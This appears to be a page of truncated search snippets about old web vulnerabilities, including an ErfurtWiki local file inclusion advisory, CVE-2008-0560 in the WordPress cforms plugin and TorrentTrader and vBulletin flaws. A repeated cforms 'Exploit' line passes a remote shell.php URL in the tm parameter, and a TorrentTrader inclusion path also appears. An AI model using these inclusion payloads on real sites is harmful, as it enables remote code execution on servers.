erfurtwiki-lfi.txt

/ | || | | | | | | | | /| | | | | || ||| ||||| || C. H. R. O. O. T. SECURITY GROUP - -- ----- --- -- -- ---- --- -- - http://www.chroot.org Hacks In Taiwan | || | | | | | | | Conference 2008 | | | | | | | | | || ||| || |||| http://www.hitcon.org Title =======:: ErfurtWiki = R1.02b css Local...

ErfurtWiki R1.02b - Local File Inclusion

ErfurtWiki R1.02b - Local File Inclusion / | || | | | | | | | | /| | | | | || ||| ||||| || C. H. R. O. O. T. SECURITY GROUP - -- ----- --- -- -- ---- --- -- - http://www.chroot.org Hacks In Taiwan | || | | | | | | | Conference 2008 | | | | | | | | | || ||| || |||| http://www.hitcon.org Title...

ErfurtWiki R1.02b - Local File Inclusion

/ | || | | | | | | | | /| | | | | || ||| ||||| || C. H. R. O. O. T. SECURITY GROUP - -- ----- --- -- -- ---- --- -- - http://www.chroot.org Hacks In Taiwan | || | | | | | | | Conference 2008 | | | | | | | | | || ||| || |||| http://www.hitcon.org Title =======:: ErfurtWiki = R1.02b css Local...

Remote file inclusion

PHP remote file inclusion vulnerability in cforms-css.php in Oliver Seidel cforms contactforms, a Wordpress plugin, allows remote attackers to execute arbitrary PHP code via a URL in the tm parameter. NOTE: CVE disputes this issue for 7.3, since there is no tm parameter, and the code exits with a...

CVE-2008-0560

CVE-2008-0560 affects the WordPress plugin cforms (Oliver Seidel cforms, also known as contactforms). The vulnerability is in cforms-css.php and allows remote attackers to execute arbitrary PHP code via a URL parameter tm, due to a PHP remote file inclusion. Several sources note that version 7.3 ...

PT-2008-2186 · Oliver Seidel · Cforms

Name of the Vulnerable Software and Affected Versions: cforms contactforms versions prior to 7.3 Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the tm parameter in the cforms-css.php file. This is a PHP remote file inclusion vulnerability in the Oliver...

WordPress Contact Form Plugin <= 7.3 - Remote File Inclusion

Because of this vulnerability in cforms-css.php, the attackers can execute arbitrary PHP code via a URL in the "tm" parameter. Solution Update the plugin...

contactforms-rfi.txt

Discovery by: Sw33t h4cK3r ----------- Exploit : http://Example.com/contactforms/cforms-css.php?tm=http://site.com/shell.php...

contactforms &quot;cforms-css.php&quot; Remote File Inclusion

Discovery by: Sw33t h4cK3r ----------- Exploit : http://Example.com/contactforms/cforms-css.php?tm=http://site.com/shell.php...

CVE-2007-5312

Cross-site scripting XSS vulnerability in TorrentTrader Classic 1.07 allows remote attackers to inject arbitrary web script or HTML via the 1 color parameter to pjirc/css.php and the 2 cat parameter to browse.php...

TorrentTrader Classic Mutiple Remote vulnerabilities

Hello,, TorrentTrader Classic Mutiple Remote vulnerabilities Discovered By : HACKERS PAL Copy rights : HACKERS PAL Website : http://www.soqor.net Email Address : [email protected] Tested on TorrentTrader Classic v1.07 local file inclusion backend/admin-functions.php?ssuri=dd Xss...

CVE-2005-3020

Multiple cross-site scripting XSS vulnerabilities in vBulletin before 3.0.9 allow remote attackers to inject arbitrary web script or HTML via the 1 group parameter to css.php, 2 redirect parameter to index.php, 3 email parameter to user.php, 4 goto parameter to language.php, 5 orderby parameter t...